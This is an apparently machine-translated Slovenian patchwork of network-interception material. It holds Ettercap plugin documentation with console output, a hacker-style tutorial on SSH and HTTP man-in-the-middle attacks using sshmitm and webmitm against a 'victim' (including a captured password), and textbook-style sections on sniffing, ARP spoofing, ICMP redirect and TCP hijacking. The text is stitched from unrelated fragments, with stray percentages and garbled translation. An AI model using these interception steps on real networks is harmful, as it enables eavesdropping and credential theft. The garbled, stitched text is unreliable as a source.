Ta vtičnik prekine zahteve DNS in se odzove s ponarejenim (lažnim) odgovorom. Z urejanjem datoteke etter.dns lahko izberete, na kateri naslov naj se vtičnik odzove. Vtičnik prestreže zahteve A, AAAA, PTR, MX, WINS, SRV in TXT. Če je bila zahteva A, se ime poišče v datoteki in vrne se naslov IP (v imenu lahko uporabite nadomestne znake).

Enako velja za zahteve AAAA.

7.5 find_conn

Zelo preprost vtičnik, ki posluša zahteve ARP, da vam pokaže vse cilje, s katerimi želi gostitelj komunicirati. Prav tako vam lahko pomaga najti naslove v neznanih omrežjih LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Poskuša identificirati pakete ettercap, poslane v LAN. Lahko je koristen pri prepoznavanju nekoga, ki poskuša uporabiti ettercap. Ne zanašajte se na to 100 %, saj testi delujejo samo na določenih sekvencah/ID številkah.

7.7 scan_poisoner

Preveril bo, ali se kdo pretepa med gostitelji na seznamu in nami. Najprej preveri, ali imata dva gostitelja na seznamu enaka Mac naslov. To lahko pomeni, da nas eden od njiju zastruplja tako, da se pretvarja, da je drugi. V okolju proxy-arp lahko ustvari veliko lažno pozitivnih rezultatov. Za izvedbo tega preverjanja morate sestaviti seznam gostiteljev. Po tem pošlje pakete icmp echo vsakemu gostitelju na seznamu in preveri, ali se naslov mac vira odziva razlikuje od naslova, ki smo ga shranili na seznam s tem IP-jem. To lahko pomeni, da nekdo vabi tega gostitelja tako, da se pretvarja, da ima naš naslov IP, in nam posreduje prestrežene pakete. Tega aktivnega preizkusa ne morete izvajati v nežaljivem načinu.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Poskuša ugotoviti, ali kdo voha (posluša) v promiskuitetnem načinu. Vsakemu cilju na seznamu gostiteljev pošlje dve različni slabo oblikovani zahtevi arp in čaka na odgovore. Če je odgovor prišel od ciljnega gostitelja, je bolj ali manj verjetno, da ima cilj omrežno kartico v promiskuitetnem načinu. Lahko povzroči lažne alarme. Zaženete ga lahko iz ukazne vrstice ali iz menija vtičnikov. Ker posluša odgovore arp, bo bolje, če jih ne uporabljate med pošiljanjem zahtev arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Primer uspešnega ugibanja dveh omrežnih kartic v promiskuitetnem načinu:

Razširi

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Posluša na: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00: 27ff:feaf:30b9/64 Disekcija SSL potrebuje veljaven skript "redir_command_on" v datoteki etter.conf Ettercap morda ne bo deloval pravilno. /proc/sys/net/ipv6/conf/eth0/use_tempaddr ni nastavljen na 0. Privilegiji so padli na EUID 65534 EGID 65534... 33 vtičnikov 42 disektorjev protokolov 57 nadzorovanih vrat 20388 prstni odtis prodajalca mac 1766 tcp prstni odtis OS 2182 znane storitve Lua : noben skript ni bil določen, ni zagona! Naključno izbiranje 255 gostiteljev za skeniranje ... Pregledovanje celotne omrežne maske za 255 gostiteljev ... * |=============================== ============= ====================>| 100,00 % 5 gostiteljev dodanih na seznam gostiteljev ... Zagon poenotenega vohanja ... Vmesnik samo za besedilo aktiviran ... Pritisnite "h" za vgrajeno pomoč Aktiviranje vtičnika search_promisc ... search_promisc: Iskanje promisc NIC-jev ... Manj verjetno vohanje NIC-jev : - 192.168.1.36 - 192.168.1.34 Najverjetneje vohanje NIC-jev: - BREZ Zapiranje besedilnega vmesnika ... Prekinitev ettercapa ... Čiščenje Lua končano! Poenoteno vohanje je bilo ustavljeno.

7.9 sslstrip

Med napadom SSL mitm ettercap zamenja pravi SSL certifikat s svojim. Lažno potrdilo se ustvari sproti in vsa polja se izpolnijo v skladu s pravim potrdilom, ki ga prikaže strežnik.

(62%)

(56.5%)

(NAKLJUČNO - 0,2%)

V tem članku si bomo ogledali napade, kot je Man-in-the-Middle, oziroma metodo
preusmerjanje SSH in HTTP prometa z uporabo napada Man in the Middle. Ne vlecimo mačke za rep, ampak se lotimo zadeve.

Človek v sredini (na kratko MitM, iz ruščine preprosto - »napad posrednika« ali »človek
na sredini«) je vrsta napada, ki temelji na preusmerjanju prometa med dvema strojema za prestrezanje informacij – nadaljnje preučevanje, uničenje ali spreminjanje. Torej, prva stvar, ki jo potrebujemo, je paket dsniff (povezavo do paketa boste videli na zakaj da, ker ta paket vsebuje vse potrebne pripomočke, vključno s sshmitm (preusmerjanje prometa SSH) in httpmitm (preusmerjanje prometa HTTP), ki lahko zaobide naslednjo varnostno shemo: kolikor veste, protokoli z šifriranje podatkov je precej - so "varni" (šifriranje pomaga :)) in ne dovoljujejo izvajanja napadov "na vrhu" omrežne plasti. Šifrirni ključ hekerju ni znan - podatkov je nemogoče dešifrirati in vstavite tudi ukaz. Zdi se, da je vse v redu, toda tukaj je, kako
ker napadalna programa MitM (sshmitm in httpmitm) iz paketa dsniff lahko obideta ta sistem varnost (zaobidete lahko skoraj vse). Vse to poteka po naslednjem načelu:
vmesni gostitelj prejme zahtevo od odjemalca, mu "pove", da je strežnik, nato pa se poveže s pravim strežnikom.
Druga stvar, ki jo potrebujemo, so ravne roke, četrta stvar, kar je najpomembnejše, je želja in seveda žrtev, to je računalnik, ki ga bomo napadli.

Preusmerjanje SSH prometa

Po pripravi orodja ste razumeli, kaj je kaj in zakaj :). Get sshmitm - zdaj bomo preusmerili SSH promet (vse kar niste razumeli s teoretičnim delom - preberite zgoraj)
z njegovo uporabo in izkoriščanjem pomanjkljivosti današnjega PKI (infrastruktura javnih ključev – shema upravljanja ključev, ki temelji na
metode asimetrične kriptografije). Poglejmo sintakso
sshmitm:

sshmitm [-d] [-I] [-p vrata] gostitelj

D
dovoli izhod za odpravljanje napak (tj. naprednejši način)

jaz
ugrabitev seje

P vrata
vrata za poslušanje

gostitelj
naslov oddaljenega gostitelja, katerega seje bodo prestrežene

pristanišče
vrata na oddaljenem gostitelju

Vse se zdi preprosto in okusno - nič ni zapleteno :). Začnimo izvajati napad!

# sshmitm server.target.gov // določite svoj strežnik SSH
sshmitm: posredovanje na strežnik server.target.gov

Ker nimamo pravega ključa SSH, je napadel tolmač ukazov
bo prikazal zahtevo za preverjanje ključa gostitelja, vse bo videti nekako takole:

clientmachine$ server.target.gov
@OPOZORILO: IDENTIFIKACIJA ODDALJENEGA GOSTITELJA JE SPREMENJENA! @
MOŽNO JE, DA NEKDO POČNE KAJ GRODNEGA!
Morda vam nekdo trenutno prisluškuje (napad človeka v sredini)!
Možno je tudi, da je bil gostiteljski ključ RSA pravkar spremenjen.
Obrnite se na skrbnika sistema.

In potem se bo uporabnik odločil, ali se bo povezal ali ne. Če da, potem bomo imeli popoln nadzor nad sejo SSH.
AMPAK! Če se uporabnik še nikoli ni povezal s tem avtomobilom, se lahko prikaže naslednje sporočilo:

Pristnosti gostitelja "server.target.gov" ni mogoče ugotoviti
Prstni odtis ključa RSA je
bla:bla:bla;bla;bla........
Ali ste prepričani, da želite nadaljevati povezovanje (da/ne)?

Tu ima uporabnik tudi dve možnosti - se povezati ali ne. Če da, potem smo prestregli sejo, če ne, potem žal ... :(.
Na splošno je bil napad uspešen, če se je uporabnik povezal, sshmitm pa je posnel vse prehode in prijave, in to na zelo berljiv način :)
Seveda to ni edini prestreznik sej SSH, a ko se boste seznanili z njim, boste zlahka obvladali še katerega :)

Preusmerjanje HTTP prometa

Zdaj bomo preusmerili promet HTTP. Spet bomo potrebovali predhodno izbrano orodje: httpmitm, ki posluša vrata 80 (HTTP -) in 443 (HTTPS -), prestreže SPLETNE zahteve, se nato poveže s strežnikom in zahteve posreduje odjemalskemu računalniku. Program tudi generira SSL ključe in SSL certifikate z uporabo OpenSSL. Nato po poskusu
se poveže s spletnim mestom (target.gov), bo brskalnik preveril potrdilo SSL. Ker se potrdila ne bodo ujemala, bo uporabnikov brskalnik opozoril na
napačen SSL certifikat. Z vidika napadalca bo to videti nekako takole:

#webmitm -d
webmitm: pregledno posredovanje
webmitm: nova povezava od
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[različica]
Povezava: [vrsta]
Gostitelj: www.target.gov
User-Agent: [sistem, informacije o brskalniku]
[itd, itd, itd]
Piškotek: [piškotki]

Tako je vse videti od zunaj -
povezava SSL je prestrežena in zajema nešifrirane podatke.

Zaključek

V tem članku smo si ogledali preusmeritev prometa SSH in HTTP z uporabo napada Man in the Middle – jasno, podrobno, na kratko. Drugi preusmerjevalniki HTTP in SSH
Promet z uporabo MitM boste hitro obvladali, če ste obvladali tudi te :)). Če je bilo kaj nejasno, potem ...

Prestrezanje podatkov po omrežju je sprejem kakršne koli informacije z oddaljene računalniške naprave. Lahko je sestavljen iz osebnih podatkov uporabnika, njegovih sporočil in evidence obiskov spletnega mesta. Zajem podatkov se lahko izvede z vohunsko programsko opremo ali uporabo omrežnih vohalcev.

Vohunska programska oprema je posebna programska oprema, ki lahko beleži vse informacije, ki se prenašajo po omrežju z določene delovne postaje ali naprave.

Sniffer je program ali računalniška tehnologija, ki prestreže in analizira promet, ki poteka skozi omrežje. Sniffer vam omogoča povezavo s spletno sejo in izvajanje različnih operacij v imenu lastnika računalnika.

Če informacije niso posredovane v realnem času, vohunska programska oprema ustvariti poročila, ki olajšajo ogled in analizo informacij.

Prestrezanje omrežja se lahko izvaja zakonito ali nezakonito. Glavni dokument, ki določa zakonitost pridobivanja informacij, je Konvencija o kibernetski kriminaliteti. Nastala je na Madžarskem leta 2001. Pravne zahteve se lahko nekoliko razlikujejo od države do države, vendar je ključno sporočilo enako za vse države.

Klasifikacija in načini prestrezanja podatkov v omrežju

V skladu z zgoraj navedenim lahko prestrezanje informacij prek omrežja razdelimo na dve vrsti: pooblaščeno in nepooblaščeno.

Pooblaščeni zajem podatkov se izvaja za različne namene, od zaščite korporativnih informacij do zagotavljanja nacionalne varnosti. Podlage za izvedbo takšne operacije določajo zakonodaja, posebne službe, uradniki organov pregona in strokovnjaki. upravnih organizacij in varnostne storitve podjetja.

Obstajajo mednarodni standardi za izvajanje prestrezanja podatkov. European Telecommunications Standards Institute je uspel uskladiti številne tehnične procese (ETSI ES 201 158 “Telecommunications security; Lawful Interception (LI); Requirements for network functions”), na katerih temelji prestrezanje informacij. Kot rezultat je bila razvita sistemska arhitektura, ki strokovnjakom tajnih služb in skrbnikom omrežja pomaga zakonito pridobivati podatke iz omrežja. Razvita struktura za izvajanje prestrezanja podatkov v omrežju se uporablja za žično in brezžični sistemi glasovni klici, kot tudi korespondenca po pošti, prenos glasovnih sporočil preko IP, izmenjava informacij preko SMS.

Nepooblaščeno prestrezanje podatkov v omrežju izvajajo napadalci, ki se želijo polastiti zaupnih podatkov, gesel, skrivnosti podjetja, naslovov računalniških strojev v omrežju itd. Za dosego svojih ciljev hekerji običajno uporabljajo analizator omrežnega prometa – sniffer. Ta program ali strojno-programska naprava daje prevarantu možnost prestrezanja in analiziranja informacij v omrežju, na katerega je povezan uporabnik žrtve, vključno s šifriranim prometom SSL prek ponarejanja potrdil. Prometne podatke je mogoče pridobiti na različne načine:

poslušanje omrežnega vmesnika,
priključitev prestrezne naprave na prekinitev kanala,
ustvarjanje prometne veje in njeno podvajanje v vohalnik,
z izvedbo napada.

Obstajajo tudi bolj zapletene tehnologije za prestrezanje pomembnih informacij, ki omogočajo vdor v omrežne interakcije in spreminjanje podatkov. Ena taka tehnika so lažne zahteve ARP. Bistvo metode je zamenjava naslovov IP med računalnikom žrtve in napravo napadalca. Druga metoda, ki jo je mogoče uporabiti za prestrezanje podatkov prek omrežja, je lažno usmerjanje. Vključuje zamenjavo naslova IP omrežnega usmerjevalnika z vašim lastnim naslovom. Če kibernetski kriminalec ve, kako je organizirano lokalno omrežje, v katerem se nahaja žrtev, potem lahko enostavno organizira prejem informacij iz uporabnikovega stroja na njegov naslov IP. Služi tudi zajem TCP povezave na učinkovit način prestrezanje podatkov. Napadalec prekine komunikacijsko sejo tako, da ustvari in pošlje pakete TCP v računalnik žrtve. Nato se komunikacijska seja obnovi, prestreže in nadaljuje kriminalec namesto stranke.

Objekt vpliva

Objekti prestrezanja podatkov v omrežju so lahko vladne agencije, industrijska podjetja, komercialne strukture in običajni uporabniki. Znotraj organizacije ali poslovnega podjetja je mogoče zajeti informacije, da se zaščiti omrežna infrastruktura. Obveščevalne agencije in organi kazenskega pregona lahko izvedejo množično prestrezanje informacij, posredovanih od različnih lastnikov, odvisno od naloge, ki jo opravljajo.

Če govorimo o kiberkriminalcih, potem lahko vsak uporabnik ali organizacija postane predmet vpliva, da pridobi podatke, ki se prenašajo po omrežju. Pri avtoriziranem dostopu je pomemben informativni del prejete informacije, medtem ko napadalca bolj zanimajo podatki, ki jih lahko uporabi za prevzem v gotovini ali dragocene informacije za njegovo poznejšo prodajo.

Najpogosteje uporabniki, ki se povežejo z javnim omrežjem, na primer v kavarni z dostopno točko, postanejo žrtve prestrezanja informacij kibernetskih kriminalcev. Wi-Fi dostop. Napadalec se poveže s spletno sejo z vohanjem, zamenja podatke in ukrade osebne podatke. Več o tem, kako se to zgodi, preberite v članku.

Vir grožnje

Pooblaščeno prestrezanje informacij v podjetjih in organizacijah izvajajo upravljavci javne omrežne infrastrukture. Njihovo delovanje je usmerjeno v varovanje osebnih podatkov, poslovnih skrivnosti in drugo pomembna informacija. Pravno lahko prenos sporočil in datotek spremljajo obveščevalne službe, organi pregona in različne vladne agencije, da zagotovijo varnost državljanov in države.

Kriminalci se ukvarjajo z nezakonitim prestrezanjem podatkov. Da ne bi postali žrtev kibernetskega kriminalca, morate upoštevati nekaj priporočil strokovnjakov. Na primer, ne smete izvajati operacij, ki zahtevajo avtorizacijo in prenos občutljivih podatkov na mestih, kjer je povezava z javnimi omrežji. Varneje je izbrati omrežja s šifriranjem in še bolje - uporabljati osebne modeme 3G in LTE. Pri prenosu osebnih podatkov je priporočljivo, da jih šifrirate s protokolom HTTPS ali osebnim VPN tunelom.

Računalnik lahko zaščitite pred prestrezanjem omrežnega prometa s kriptografijo in anti-vohanjem; Klicni namesto brezžičnega dostopa do omrežja bo zmanjšal tveganja.

Ta lekcija opisuje tehnologije vdora v omrežje, ki temeljijo na prestrezanju omrežnih paketov. Hekerji uporabljajo takšne tehnologije za poslušanje omrežnega prometa, da bi ukradli dragocene informacije, organizirali prestrezanje podatkov z namenom napada "človek v sredini", prestregli povezave TCP, kar omogoča, recimo, ponarejanje podatkov, in za izvajanje drugih enako zanimive akcije. Na žalost se večina teh napadov dejansko izvaja samo za omrežja Unix, za katera lahko hekerji uporabijo oba posebne pripomočke, in sistemska orodja Unix. Očitno so hekerji prezrli omrežja Windows, zato smo prisiljeni omejiti naš opis orodij za prestrezanje podatkov na vohalne programe, zasnovane za trivialno poslušanje omrežnih paketov. Vendar pa ne smemo zanemariti vsaj teoretičnega opisa tovrstnih napadov, zlasti za antihekerje, saj bo poznavanje uporabljenih hekerskih tehnologij pomagalo preprečiti marsikatero težavo.

Omrežno vohanje

Običajno se uporablja za vohanje omrežij Ethernet. omrežne kartice preklopil v način poslušanja. Poslušanje Ethernetna omrežja zahteva povezavo računalnika, v katerem se izvaja vohalni program, z omrežnim segmentom, po katerem postane ves omrežni promet, ki ga pošljejo in prejmejo računalniki v tem omrežnem segmentu, na voljo hekerju. Še lažje je prestreči promet iz radijskih omrežij, ki uporabljajo posrednike v brezžičnem omrežju - v tem primeru vam sploh ni treba iskati mesta za povezavo s kablom. Lahko pa se napadalec poveže s telefonsko linijo, ki povezuje računalnik z internetnim strežnikom, in za to najde primeren kraj (telefonske linije so običajno položene v kleteh in na drugih redko obiskanih mestih brez zaščite).

Za prikaz tehnologije vohanja bomo uporabili zelo priljubljen vohalni program SpyNet, ki ga najdemo na številnih spletnih mestih. Uradna spletna stran programa SpyNet se nahaja na http://members.xoom.com/layrentiu2/, kjer lahko prenesete demo različico programa.

Program SpyNet je sestavljen iz dveh komponent - CaptureNet in PipeNet. Program CaptureNet omogoča prestrezanje paketov, ki se prenašajo po omrežju Ethernet na ravni omrežja, tj. v obliki Ethernet okvirjev. Programska oprema PipeNet omogoča sestavljanje ethernetnih okvirjev v pakete aplikacijskega sloja in obnavljanje na primer sporočil E-naslov, sporočila protokola HTTP (izmenjava informacij s spletnim strežnikom) in opravlja druge funkcije.

Na žalost so v predstavitvi SpyNet zmogljivosti PipeNeta omejene na predstavitev sestavljanja paketov HTTP, zato SpyNeta ne bomo mogli predstaviti v celoti. Vendar pa bomo zmožnosti vohljanja omrežja SpyNet prikazali na našem eksperimentalnem omrežju kot primeru s posredovanjem besedilna datoteka od gostitelja Sword-2000 do gostitelja Alex-Z z uporabo običajnega Windows Explorer. Istočasno bomo na računalniku A1ex-1 zagnali program CaptureNet, ki bo prestregel poslane pakete in nam omogočil branje vsebine poslane datoteke v ethernet okvirjih. Na sl. 1 prikazuje besedilo tajnega sporočila v datoteki secret.txt; to besedilo bomo poskušali najti v zajetih Ethernet okvirjih.

riž. 1. Besedilo tajnega sporočila v oknu beležnice

Za zajem okvirjev Ethernet sledite tem korakom:

Na računalniku Alex-Z zaženite program CaptureNet. V prikazanem delovnem oknu programa izberite menijski ukaz Capture * Start (Zajemi * Start) in zaženite postopek prestrezanja omrežnih okvirjev.

Z Windows Explorerjem kopirajte datoteko security.txt iz računalnika Sword-2000 v A1ex-3.

Po prenosu datoteke secret.txt izberite menijski ukaz Capture * Stop in ustavite postopek zajema.

Zajeti ethernetni okvirji se bodo pojavili na desni strani okna programa CaptureNet (slika 2), pri čemer bo vsaka vrstica v zgornjem seznamu predstavljala ethernetni okvir, pod seznamom pa vsebino izbranega okvirja.

riž. 2. Ethernet okvir vsebuje tajno besedilo sporočila

Po pregledu seznama prestreženih sličic zlahka najdemo tistega, ki vsebuje besedilo, ki smo ga posredovali This is a very big secret (To je zelo velika skrivnost).

Poudarjamo, da gre za najenostavnejši primer, ko se beleži ves prestreženi omrežni promet. CaptureNet vam omogoča prestrezanje paketov, poslanih prek določenih protokolov in na določena gostiteljska vrata, izbiro sporočil z določeno vsebino in zbiranje zajetih podatkov v datoteki. Tehnika izvajanja takih dejanj je preprosta in se je lahko naučite s pomočjo sistema pomoči programa SpyNet.

Poleg primitivnega omrežnega prisluškovanja imajo hekerji dostop do bolj sofisticiranih načinov prestrezanja podatkov. Spodaj je kratek pregled tovrstnih metod, čeprav s teoretičnega vidika. Razlog je v tem, da je za omrežja Windows praktična izvedba napadov prestrezanja podatkov izjemno omejena, nabor zanesljivih pripomočkov za napade prestrezanja pa precej slab.

Metode za prestrezanje omrežnega prometa

Vohanje omrežja z uporabo programov za analizo omrežja, kot je zgornji CaptureNet, je prvi in najpreprostejši način za prestrezanje podatkov. Poleg SpyNeta se za vohanje po omrežju uporabljajo številna orodja, ki so bila prvotno razvita za analizo omrežne aktivnosti, diagnosticiranje omrežij, izbiranje prometa po določenih kriterijih in druga opravila skrbništva omrežja. Primer takega programa je tcpdump (http://www.tcpdump.org), ki omogoča beleženje omrežnega prometa v poseben dnevnik za kasnejšo analizo.

Za zaščito pred prisluškovanjem omrežju se uporabljajo posebni programi, na primer AntiSniff (http://www.securitysoftwaretech.com/antisniff), ki so sposobni identificirati računalnike v omrežju, ki poslušajo omrežni promet. Za rešitev svojih težav antisniffer programi uporabljajo poseben znak prisotnosti prisluškovalnih naprav v omrežju - omrežna kartica vohalnega računalnika mora biti v posebnem načinu poslušanja. Medtem ko so v načinu poslušanja, se omrežni računalniki na poseben način odzovejo na datagrame IP, poslane gostitelju, ki se testira. Na primer, poslušajoči gostitelji običajno obdelajo ves dohodni promet, ne le datagramov, poslanih na naslov gostitelja. Obstajajo tudi drugi znaki, ki kažejo na sumljivo vedenje gostitelja, ki jih AntiSniff lahko prepozna.

Lažne zahteve ARP

Da bi prestregel in prevzel proces omrežne interakcije med dvema gostiteljema A in B, lahko napadalec nadomesti naslove IP medsebojno delujočih gostiteljev s svojim naslovom IP tako, da gostiteljema A in B pošlje ponarejena sporočila ARP (Address Resolution Protocol). S protokolom ARP se lahko seznanite v Dodatku D, kjer je opisan postopek razrešitve (konvertiranja) naslova IP gostitelja v naslov stroja (MAC naslov), ki je vpisan v omrežno kartico gostitelja. Poglejmo, kako lahko heker uporabi ARP za prestrezanje omrežne komunikacije med gostiteljema A in B.

Napadalec določi naslove MAC gostiteljev A in B na primer z ukazom nbtstat iz paketa W2RK.

Napadalec pošilja sporočila na identificirana MAC naslova gostiteljev A in B, ki so ponarejeni ARP odgovori na zahteve za razrešitev IP naslovov gostiteljev v MAC naslove računalnikov. Gostitelj A je obveščen, da naslov IP gostitelja B ustreza naslovu MAC napadalčevega računalnika; gostitelj B je obveščen, da naslov IP gostitelja A ustreza tudi naslovu MAC napadalčevega računalnika.

Gostitelja A in B shranita prejete naslove MAC v svoje predpomnilnike ARP in jih nato uporabita za pošiljanje sporočil drug drugemu. Ker naslova IP A in B ustrezata naslovu MAC napadalčevega računalnika, gostitelja A in B nič hudega sluteča komunicirata prek posrednika, ki lahko z njunimi sporočili naredi karkoli.

Za zaščito pred takšnimi napadi morajo skrbniki omrežja vzdrževati zbirko podatkov s tabelo ujemanja med naslovi MAC in naslovi IP svojih omrežnih računalnikov. Nato z uporabo posebnega programsko opremo Na primer, pripomočki arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) lahko občasno pregledujejo omrežje in prepoznajo nedoslednosti.

V omrežjih UNIX je to vrsto lažnega napada na zahtevo ARP mogoče izvesti s sistemskimi pripomočki za spremljanje in upravljanje omrežnega prometa, kot je arpredirect. Na žalost se zdi, da takšni zanesljivi pripomočki niso implementirani v omrežjih Windows 2000/XP. Na spletnem mestu NTsecurity (http://www.ntsecurity.nu) lahko na primer prenesete pripomoček GrabitAII, predstavljen kot orodje za preusmerjanje prometa med omrežnimi gostitelji. Vendar že osnovno preverjanje funkcionalnosti pripomočka GrabitAII pokaže, da je do popolnega uspeha pri izvajanju njegovih funkcij še daleč.

Napačno usmerjanje

Za izvajanje napačnega usmerjanja mora napadalec poznati nekaj podrobnosti o organizaciji lokalnega omrežja, v katerem se nahaja gostitelj A, zlasti naslov IP usmerjevalnika, prek katerega se pošilja promet od gostitelja A do B. Če to pozna, napadalec bo ustvaril datagram IP, v katerem je IP naslov pošiljatelja definiran kot naslov IP usmerjevalnika, prejemnik pa je gostitelj A. V datagram je vključeno tudi sporočilo o preusmeritvi ICMP z naslovnim poljem novega usmerjevalnika, nastavljenim na IP naslov napadalčevega računalnika. Po prejemu takega sporočila bo gostitelj A vsa sporočila poslal na naslov IP napadalčevega računalnika.

Zgornji primeri prestrezanja (na katere zmožnosti napadalcev še zdaleč niso omejene) nas prepričajo o nujnosti zaščite podatkov, ki se prenašajo po omrežju, če podatki vsebujejo zaupne informacije. Edini način zaščite pred prestrezanjem omrežnega prometa je uporaba programov, ki izvajajo kriptografske algoritme in šifrirne protokole ter preprečujejo razkritje in zamenjavo tajnih podatkov. Za rešitev takšnih težav kriptografija ponuja orodja za šifriranje, podpisovanje in preverjanje pristnosti sporočil, ki se prenašajo prek varnih protokolov.

Praktično izvajanje vseh kriptografskih metod za zaščito izmenjave informacij, opisanih v 4. poglavju, zagotavljajo omrežja VPN (Virtual Private Network). Kratek pregled načel in tehnik kriptografske varnosti najdete v Dodatku E in natančen opis orodja za kriptografsko zaščito, ki jih ponuja aplikacija PGP Desktop Security (http://www.pgp.com).

Prestrezanje povezave TCP

Ustvarjenih je bilo več učinkovitih pripomočkov za izvajanje napadov na ugrabitev povezave TCP, vendar so vsi implementirani za platformo Unix, na spletnih mestih pa so ti pripomočki predstavljeni samo v obliki izvorne kode. Tako nam, kot prepričanim praktikom v plemenitost hekanja, napadi z metodo prestrezanja povezave TCP ne koristijo veliko. (Tisti, ki radi razumejo programsko kodo drugih ljudi, si lahko ogledajo spletno stran http://www.cri.cz/~kra/index.html, kjer lahko prenesete vir znani pripomoček Hunt TCP za prestrezanje povezav Pavla Krauza).

Kljub pomanjkanju praktičnih orodij ne moremo prezreti tako zanimive teme, kot je prestrezanje povezav TCP, zato se bomo podrobneje posvetili nekaterim vidikom takšnih napadov. Nekaj informacij o strukturi paketa TCP in postopku za vzpostavljanje povezav TCP je podanih v dodatku D te knjige, tukaj pa se bomo osredotočili na vprašanje - kaj točno omogoča hekerjem, da izvajajo napade s prestrezanjem povezave TCP? Oglejmo si to temo podrobneje, pri čemer se opiramo predvsem na razpravo v in.

Protokol TCP (Transmission Control Protocol) je eden od osnovnih protokolov transportne plasti OSI, ki vam omogoča vzpostavljanje logičnih povezav prek virtualnega komunikacijskega kanala. Po tem kanalu se prenašajo in sprejemajo paketi s posnetim zaporedjem, nadzoruje se pretok paketov, organizira retransmisija popačenih paketov in na koncu seje se komunikacijski kanal prekine. Protokol TCP je edini jedrni protokol v družini TCP/IP, ki ima napreden sistem identifikacije sporočil in povezave.

Za prepoznavanje paketa TCP sta v glavi TCP dva 32-bitna identifikatorja, ki delujeta tudi kot števec paketov, imenovana zaporedna številka in številka potrditve. Zanimalo nas bo še eno polje TCP paketa, imenovano kontrolni biti. To 6-bitno polje vključuje naslednje kontrolne bite (v vrstnem redu od leve proti desni):

URG - oznaka nujnosti;

ACK - potrditvena zastavica;

PSH - nosi zastavo;

RST - zastavica za ponovno vzpostavitev povezave;

SYN - zastavica za sinhronizacijo;

FIN - zastavica za prekinitev povezave.

Oglejmo si postopek za ustvarjanje povezave TCP.

1. Če mora gostitelj A ustvariti povezavo TCP z gostiteljem B, potem gostitelj A pošlje gostitelju B naslednje sporočilo:

A -> B: SYN, ISSa

To pomeni, da ima sporočilo, ki ga pošlje gostitelj A, nastavljeno zastavo SYN (Sinhroniziraj zaporedno številko), polje zaporedne številke pa je nastavljeno na začetno 32-bitno vrednost ISSa (začetno zaporedno število).

2. V odgovor na zahtevo, prejeto od gostitelja A, gostitelj B odgovori s sporočilom, v katerem je nastavljen bit SYN in bit ACK. V polju zaporedne številke gostitelj B nastavi svojo začetno vrednost števca - ISSb; polje številke potrditve bo nato vsebovalo vrednost ISSa, prejeto v prvem paketu od gostitelja A, povečano za ena. Torej gostitelj B odgovori s tem sporočilom:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Končno gostitelj A pošlje sporočilo gostitelju B, v katerem: je nastavljen bit ACK; polje zaporedne številke vsebuje vrednost ISSa + 1; Polje številke potrditve vsebuje vrednost ISSb + 1. Po tem se šteje, da je povezava TCP med gostiteljema A in B vzpostavljena:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Zdaj lahko gostitelj A pošlje podatkovne pakete gostitelju B prek novo ustvarjenega virtualnega kanala TCP:

A -> B: ACK, ISSa+1, ACK(ISSb+1); PODATKI

Tukaj DATA pomeni podatke.

Iz zgoraj obravnavanega algoritma za ustvarjanje povezave TCP je razvidno, da sta edina identifikatorja naročnikov TCP in povezave TCP dva 32-bitna parametra zaporedne številke in številke potrditve - ISSa in ISSb. Torej, če hekerju uspe ugotoviti trenutne vrednosti polj ISSa in ISSb, mu nič ne bo preprečilo ustvarjanja ponarejenega paketa TCP. To pomeni, da mora heker samo izbrati trenutne vrednosti parametrov ISSa in ISSb paketa TCP za dano povezavo TCP, poslati paket s katerega koli internetnega gostitelja v imenu odjemalca te povezave TCP in ta paket bo zaznano kot pravilno!

Nevarnost takšnega ponarejanja paketov TCP je pomembna tudi zato, ker sta protokola FTP in TELNET na visoki ravni implementirana na podlagi protokola TCP, prepoznavanje odjemalcev paketov FTP in TELNET pa v celoti temelji na protokolu TCP.

Poleg tega, ker protokola FTP in TELNET ne preverjata naslovov IP pošiljateljev sporočila, bosta strežnika FTP ali TELNET po prejemu ponarejenega paketa poslala odgovor na naslov IP hekerskega gostitelja, navedenega v lažnem paketu. Po tem bo hekerski gostitelj začel delati s strežnikom FTP ali TELNET s svojega naslova IP, vendar s pravicami zakonito povezanega uporabnika, ki bo posledično izgubil stik s strežnikom zaradi neusklajenosti števcev.

Tako je za izvedbo zgoraj opisanega napada nujen in zadosten pogoj poznavanje dveh trenutnih 32-bitnih parametrov ISSa in ISSb, ki identificirata povezavo TCP. Razmislimo možne načine jih prejemajo. V primeru, ko je hekerski gostitelj povezan z napadenim segmentom omrežja, je naloga pridobivanja vrednosti ISSa in ISSb trivialna in jo je mogoče rešiti z analizo omrežnega prometa. Zato je treba jasno razumeti, da protokol TCP načeloma omogoča zaščito povezave le, če je nemogoče, da bi napadalec prestregel sporočila, poslana prek ta povezava, torej le v primeru, ko je hekerski gostitelj povezan z omrežnim segmentom, ki je drugačen od naročniškega segmenta povezave TCP.

Zato so za hekerja najbolj zanimivi intersegmentni napadi, ko sta napadalec in njegova tarča v različnih segmentih omrežja. V tem primeru naloga pridobivanja vrednosti ISSa in ISSb ni trivialna. Za rešitev te težave sta bili izumljeni samo dve metodi.

Matematična napoved začetne vrednosti parametrov povezave TCP z ekstrapolacijo prejšnjih vrednosti ISSa in ISSb.

Izkoriščanje ranljivosti pri prepoznavanju naročnikov povezave TCP na strežnikih Unix rsh.

Prvo nalogo rešujemo s poglobljenimi študijami implementacije protokola TCP v različnih operacijski sistemi in ima zdaj čisto teoretični pomen. Drugi problem je rešen z uporabo ranljivosti Unix sistemi z identifikacijo zaupanja vrednih gostiteljev. (Zaupanja vreden glede na danega gostitelja A je omrežni gostitelj B, katerega uporabnik se lahko poveže z gostiteljem A brez avtentikacije z uporabo storitve r gostitelja A). Z manipulacijo parametrov paketov TCP lahko heker poskuša lažno predstavljati zaupanja vrednega gostitelja in prestreči povezavo TCP z napadenim gostiteljem.

Vse to je zelo zanimivo, vendar praktični rezultati tovrstnih raziskav še niso vidni. Zato vsem, ki se želijo poglobiti v to tematiko, svetujemo, da se obrnejo na knjigo, od koder so v glavnem povzeti zgoraj predstavljeni podatki.

